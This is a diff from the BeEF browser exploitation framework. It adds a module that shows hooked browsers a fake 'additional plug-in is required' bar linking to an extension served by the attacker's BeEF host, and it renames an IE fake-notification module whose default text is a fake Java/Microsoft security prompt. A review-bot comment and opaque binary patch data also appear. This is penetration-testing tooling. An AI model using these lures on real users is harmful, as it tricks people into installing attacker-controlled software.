zRBzO}{jFAee8N$h?1sPI?k7*_*;CZf0c}puFB=fmp}NOap}?g1hp)KNjqy`j4g~s) zf6!eI`KsREE5iBp+6}tpNGXoU+zcRyE_~AfNu2Lju#9(;a6Fx!;E1jO_d(@TQ60NR zOOlEFQcVzgq!ww|_q0TjCS8MCUOqfv9DJWa&lw|n2MMbal+?GG*Eh>P;k>nN z(-^T{UR;=viF4gm^Iu)*8A!tieTq5kA0C@MfA+rv*C`VdZiX2UdA-dER+dh%TSKa- zslWG8#2pPujx;jSQ%r`h}`)Msp3| zl{a@a$WmTABftWY*;c*@p=vZ^V!ys<1AuQ-SLyT~P&L);&_JIiBtXC+&vh=Y;{sUc zOOl;TuPqe_61IP8S z;&aPC97>hWpqMcK|Fo+G5w$2oB?9$33-B)hk{Zo#qYsV;Xr<_l6-XDo?Dk$;(s2d^ zdn!vwPU!1b@W*}o#&Db|LpQAw{g-$7c7TXdA_jlf=*}Ng10z;+`Fly@QeH#mVSOcQ5-NFo^|1Q!$K#jcZz%ennD@#n(D%ro>(f=3v eS0ed;BV!zPiZ>VD#s7n1fk=q_7OoN03;2KKGp>pN literal 0 HcmV?d00001 diff --git a/modules/social_engineering/fake_notification_ff/module.rb b/modules/social_engineering/fake_notification_ff/module.rb new file mode 100644 index 000000000..fba9d4154 --- /dev/null +++ b/modules/social_engineering/fake_notification_ff/module.rb 
@@ -0,0 +1,32 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_notification_ff < BeEF::Core::Command
+
+ def self.options
+ @configuration = BeEF::Core::Configuration.instance
+ beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+ url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension'
+ return [
+ {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},
+ { 'name' => 'notification_text',
+ 'description' => 'Text displayed in the notification bar',
+ 'ui_label' => 'Notification text',
+ 'value' => "An additional plug-in is required to display some elements on this page."
+ }
+ ]
+ end
+
+ #
+ # This method is being called when a zombie sends some
+ # data back to the framework.
+ #
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result']
+ save content
+ end
+
+end
diff --git a/modules/social_engineering/fake_notification/command.js b/modules/social_engineering/fake_notification_ie/command.js
similarity index 100%
rename from modules/social_engineering/fake_notification/command.js
rename to modules/social_engineering/fake_notification_ie/command.js
diff --git a/modules/social_engineering/fake_notification/config.yaml b/modules/social_engineering/fake_notification_ie/config.yaml
similarity index 64%
rename from modules/social_engineering/fake_notification/config.yaml
rename to modules/social_engineering/fake_notification_ie/config.yaml
index fb4ccf970..25604d287 100644
--- a/modules/social_engineering/fake_notification/config.yaml
+++ b/modules/social_engineering/fake_notification_ie/config.yaml
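Review bot: In `self.options` of fake_notification_ff/module.rb, the `'http://' + beef_host + ':' + @configuration.get("beef.http.port") + ...` concatenation raises a TypeError if the port is held as an Integer in the configuration, which this hunk does not show; interpolation does not depend on the stored type: `url = "http://#{beef_host}:#{@configuration.get('beef.http.port')}/api/ipec/ff_extension"`. The configuration handle is also kept in a class-level instance variable (`@configuration`) although it is only read inside this method, so a local variable would do. In `post_execute`, `@datastore['result']` is saved exactly as the hooked browser sent it; command.js only sends two fixed strings, but the browser side is not under the framework's control, so a comment such as `# result is browser-supplied; treat as untrusted wherever it is displayed` would help whoever renders it later.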
@@ -5,11 +5,11 @@ # beef: module: - fake_notification: + fake_notification_ie: enable: true category: "Social Engineering" - name: "Fake Notification" - description: "Displays a fake notification at the top of the screen, similar to those presented in IE." + name: "Fake Notification Bar (IE)" + description: "Displays a fake notification bar at the top of the screen, similar to those presented in IE." authors: ["xntrik"] target: user_notify: ['ALL'] diff --git a/modules/social_engineering/fake_notification/module.rb b/modules/social_engineering/fake_notification_ie/module.rb similarity index 86% rename from modules/social_engineering/fake_notification/module.rb rename to modules/social_engineering/fake_notification_ie/module.rb index c169f99a5..ff55ea7d5 100644 --- a/modules/social_engineering/fake_notification/module.rb +++ b/modules/social_engineering/fake_notification_ie/module.rb @@ -3,13 +3,13 @@ # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # -class Fake_notification < BeEF::Core::Command +class Fake_notification_ie < BeEF::Core::Command def self.options return [ { 'name' => 'notification_text', 'description' => 'Text displayed in the notification bar', - 'ui_label' => 'Text displayed in the notification bar', + 'ui_label' => 'Notification text', 'value' => "This website wants to run the following applet: \\'Java\\' from \\'Microsoft Inc\\'. To continue using this website you must accept the following security popup" } ]